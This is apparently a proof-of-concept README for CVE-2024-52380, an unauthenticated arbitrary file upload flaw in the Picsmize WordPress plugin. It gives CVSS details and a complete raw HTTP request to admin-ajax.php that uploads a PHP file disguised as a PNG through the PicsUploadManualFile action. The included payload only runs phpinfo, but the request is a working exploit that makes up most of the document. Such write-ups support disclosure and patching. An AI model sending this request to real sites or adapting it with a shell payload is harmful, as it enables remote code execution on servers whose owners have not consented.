# CVE-2024-52380
Picsmize <= 1.0.0 - Unauthenticated Arbitrary File Upload
# Description
The Picsmize plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
```
Score: 10.0
Vendors: Softpulse Infotech
Products: Picsmize
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Interaction: none
Privileges: none
Attack Vector: network
```
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=pics-manual
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------263629263440545280502417734995
Content-Length: 371
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
-----------------------------263629263440545280502417734995
Content-Disposition: form-data; name="images[]"; filename="t.php"
Content-Type: image/png
<?php phpinfo(); ?>
-----------------------------263629263440545280502417734995
Content-Disposition: form-data; name="action"
PicsUploadManualFile
-----------------------------263629263440545280502417734995--
```
[4.0K] /data/pocs/74235e3cadecf182d799810a78afb0685f591df7
└── [1.6K] README.md
0 directories, 1 file